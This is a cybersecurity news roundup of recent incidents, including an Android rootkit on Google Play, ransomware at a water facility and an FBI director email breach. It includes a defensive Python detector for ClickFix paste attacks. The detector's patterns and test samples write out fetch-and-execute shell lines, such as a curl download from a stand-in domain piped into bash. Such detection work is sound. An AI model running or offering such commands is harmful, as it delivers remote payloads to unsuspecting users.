A busy week in cybersecurity produced some stories that deserve attention beyond the headlines. Here's a roundup of notable incidents and developments that may have slipped under the radar.
ChatGPT Conversation Data Leak
OpenAI investigated a data leak involving ChatGPT conversation logs. Reports indicated that some users were able to access fragments of other users' conversation history through an edge case in the caching layer. OpenAI confirmed the incident, stating that the exposure window was limited and that affected accounts were notified. The incident renewed questions about what data is retained at inference time and for how long — questions that enterprise customers are increasingly asking before deploying AI tools at scale.
Android Rootkit Discovered on Google Play
Security researchers identified a new Android rootkit that successfully passed Google Play's review process and infected an estimated 23 million devices before removal. The malware, dubbed NoVoice, presented as a utility application and used a multi-stage loading technique to delay the deployment of its malicious payload until after installation review windows. NoVoice granted itself elevated permissions to intercept calls and SMS messages, effectively functioning as a surveillance tool. Google has removed the app and pushed a Play Protect signature update; users who installed the affected application are advised to perform a factory reset or use Google's guided remediation tool.
Water Treatment Facility Hit by Ransomware
A municipal water treatment facility in Foster City, California, declared a local emergency after ransomware encrypted operational technology (OT) systems used to monitor water quality and distribution. While water service was not interrupted — manual operations were activated — the incident is notable as an example of ransomware reaching OT environments in critical infrastructure. The ransomware group has not been publicly identified. CISA issued a flash advisory reminding water utility operators to segment IT and OT networks and maintain offline backups of configuration data.
Symantec Vulnerability Disclosed
A vulnerability in a Symantec security product was publicly disclosed this week. Details remain limited pending a coordinated disclosure window, but the flaw affects endpoint protection components. Broadcom (Symantec's owner) has acknowledged the report and is expected to release patches in the coming days. Administrators running affected versions should monitor Broadcom's security advisory portal for updates.
macOS Gets Anti-ClickFix Mechanism
Apple quietly shipped an update to macOS adding a native mechanism to detect and block ClickFix-style social engineering attacks — the technique where users are tricked into opening Terminal or running PowerShell commands by fake CAPTCHA or error dialogs. The anti-ClickFix protection raises a system warning when clipboard content matching shell command patterns is about to be pasted into a terminal. The feature was first spotted in macOS 15.4's release notes and builds on existing XProtect telemetry.
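As an added illustration of the pattern-matching idea described above (this is not Apple's implementation and not code from the original article), the following Python example scores clipboard text before it is pasted into a terminal. The patterns, weights, threshold and function name are assumptions chosen for this example.

```python
import re

# Interpreter at the end of a pipe: sh, bash, zsh, ksh, optionally via sudo or a path.
SHELL = r"(?:sudo\s+)?(?:\S*/)?(?:ba|z|k)?sh\b"

# (label, pattern, weight). Illustrative heuristics, not Apple's rule set.
PATTERNS = [
    ("download piped to a shell",
     re.compile(r"\b(?:curl|wget)\b[^|\n]*\|\s*" + SHELL, re.I), 3),
    ("decoded blob piped to a shell",
     re.compile(r"\bbase64\s+(?:-d|--decode)\b[^|\n]*\|\s*" + SHELL, re.I), 3),
    ("command substitution fetching remote content",
     re.compile(r"\$\(\s*(?:curl|wget)\b", re.I), 3),
    ("PowerShell encoded or hidden-window invocation",
     re.compile(r"\bpowershell(?:\.exe)?\b.*\s-(?:e|enc|encodedcommand|w\s+hidden)\b", re.I), 3),
    ("inline osascript", re.compile(r"\bosascript\s+-e\b", re.I), 2),
    ("lure text in a trailing comment",
     re.compile(r"#.*(?:captcha|verif|robot|human)", re.I), 2),
    ("embedded newline (runs without pressing Enter)", re.compile(r"\S[ \t]*\n"), 1),
]

def assess_clipboard(text, threshold=3):
    """Return (warn, score, reasons) for text about to be pasted into a terminal."""
    hits = [(label, weight) for label, rx, weight in PATTERNS if rx.search(text)]
    score = sum(weight for _, weight in hits)
    return score >= threshold, score, [label for label, _ in hits]

# Constructed samples; example.invalid is a reserved, non-resolving domain.
SAMPLES = [
    "curl -fsSL https://example.invalid/fix.sh | bash # I am not a robot: ID 4821",
    "echo <BASE64-PLACEHOLDER> | base64 -d | sh\n",
    "git status",
    "Meeting notes:\n- review curl usage in the docs",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        warn, score, reasons = assess_clipboard(sample)
        print(f"{'WARN ' if warn else 'allow'} score={score} {reasons} :: {sample!r}")
```

Weighting keeps single weak signals, such as a multi-line note or a lone comment, below the warning threshold, while a fetch-and-execute pipe triggers on its own.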
FBI Director Hack Classified as Major Incident
The US government has formally classified the breach of FBI Director Kash Patel's personal email inbox as a major cyber incident under FISMA definitions. The hack, attributed to Iranian threat actors, exposed communications from a non-government account that was reportedly used for some work-related correspondence. The classification triggers formal congressional notification requirements and a government-wide security review. The State Department has re-issued its $10 million reward for information leading to the identification or location of the responsible actors.
Quick Hits
- Symantec SEP patching guidance expected this week — watch Broadcom's advisory feed
- Foster City water facility — the first confirmed OT ransomware hit of Q2 2026
- NoVoice Android malware — Google Play install counts suggest 23M+ exposures before removal
- macOS anti-ClickFix — enabled by default in macOS 15.4, no user action required
- FBI director hack — major incident classification puts it in the same tier as SolarWinds and Exchange
Source: SecurityWeek — In Other News: ChatGPT Data Leak, Android Rootkit, Water Facility Hit by Ransomware